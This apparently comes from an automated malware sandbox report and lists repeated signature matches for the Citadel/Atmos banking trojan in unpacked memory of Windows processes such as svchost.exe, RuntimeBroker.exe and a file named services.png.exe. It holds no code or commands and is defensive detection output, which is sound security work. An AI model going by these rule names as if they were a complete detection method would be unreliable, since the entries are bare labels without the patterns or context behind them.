                        Source: 15.3.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 39.0.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 39.0.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 28.0.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 28.0.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 28.0.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 25.0.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 25.0.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 25.0.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 0.2.services.png.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 0.2.services.png.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 0.2.services.png.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 31.0.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 31.0.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 25.3.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 25.3.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 25.3.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 17.3.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 17.3.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 17.3.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 0.3.services.png.exe.2590000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 20.3.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 20.3.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 20.3.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 41.2.XRdxSzSUL8yOL.exe.2c90000.1.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 41.2.XRdxSzSUL8yOL.exe.2c90000.1.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 22.0.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 22.0.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 22.0.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 36.2.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 36.2.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 0.2.services.png.exe.2810000.1.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 0.2.services.png.exe.2810000.1.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 27.0.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 27.0.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 27.0.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 6.0.explorer.exe.c350000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 6.0.explorer.exe.c350000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 17.0.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 17.0.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 17.0.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 8.3.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 8.3.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 8.3.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 31.2.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 31.2.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 1.3.nyheukpo.exe.20f0000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 35.2.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 35.2.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 25.3.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 25.3.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 25.3.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 16.0.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 16.0.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 16.0.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 10.0.SearchApp.exe.a90000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 10.0.SearchApp.exe.a90000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 10.0.SearchApp.exe.a90000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 18.3.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 18.3.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 18.3.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 21.3.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 21.3.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 21.3.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 0.2.services.png.exe.2810000.1.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 0.2.services.png.exe.2810000.1.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 16.3.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 16.3.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 16.3.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 19.0.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 19.0.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 19.0.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 18.3.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 18.3.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 18.3.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 26.0.conhost.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 26.0.conhost.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 26.0.conhost.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 8.3.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 8.3.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 8.3.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 31.2.XRdxSzSUL8yOL.exe.2e30000.1.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 31.2.XRdxSzSUL8yOL.exe.2e30000.1.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 19.0.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 19.0.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 19.0.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 21.0.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 21.0.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 21.0.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 28.0.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 28.0.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 28.0.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 35.0.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 35.0.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 41.0.XRdxSzSUL8yOL.exe.2c90000.1.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 41.0.XRdxSzSUL8yOL.exe.2c90000.1.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 17.3.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 17.3.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 17.3.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 23.0.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 23.0.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 23.0.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 4.0.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 4.0.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 4.0.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 38.2.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 38.2.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 22.3.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 22.3.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 22.3.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 3.3.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 3.3.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 3.3.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 14.0.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 14.0.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 14.0.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 23.3.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 23.3.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 23.3.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 26.3.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 26.3.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 26.3.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 3.3.svchost.exe.910000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 3.3.svchost.exe.910000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 3.3.svchost.exe.910000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 0.3.services.png.exe.2590000.1.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 28.3.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 28.3.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 28.3.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 23.0.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 23.0.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 23.0.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 35.0.XRdxSzSUL8yOL.exe.25d0000.1.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 35.0.XRdxSzSUL8yOL.exe.25d0000.1.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 8.0.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 8.0.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 8.0.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 22.0.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 22.0.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 22.0.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 16.0.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 16.0.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 16.0.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 21.3.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 21.3.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 21.3.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 0.3.services.png.exe.2590000.1.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 24.0.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 24.0.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 24.0.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 24.3.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 24.3.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 24.3.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 39.2.XRdxSzSUL8yOL.exe.2b30000.1.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 39.2.XRdxSzSUL8yOL.exe.2b30000.1.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
                        Source: 16.3.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
                        Source: 16.3.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: 16.3.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPEMatched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
